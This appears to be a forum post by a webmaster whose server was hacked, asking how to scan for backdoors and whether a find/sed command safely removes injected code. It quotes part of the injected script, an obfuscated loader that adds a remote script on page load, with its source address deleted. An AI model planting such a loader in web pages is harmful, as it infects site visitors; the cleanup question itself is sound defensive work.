Unfortunately, one of my web servers was compromised recently. I have two questions. Is there a way I can scan the downloaded directory for backdoors? Is there anything I can do to ensure that at least known vulnerabilities do not exist anymore?

Secondly, the malware put up the following in all index.* files on my webserver:

<script>/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type', 'text/javascript');Hva23p3hnyirlpv7.setAttribute('id', 'myscript1');Hva23p3hnyirlpv7.setAttribute('src',.... CODE DELETED FOR SAFETY.... );}} catch(e) {}</script>

Obviously, this snippet seems to download some rogue file onto the user's machine. I downloaded an entire backup of the web server and am currently trying to remove this snippet from all file. For this I am doing:

find ./ -name "index.*" -exec sed -i 's/<script>\/\*GNU GPL\*.*Hva23p3hnyirlpv7.*<\/script>//g' {} \;

Just wanted to verify if this does the trick. I verified it with a few files but I want to be sure that this doesn't delete some valid code. Anyone suggests any other modifications?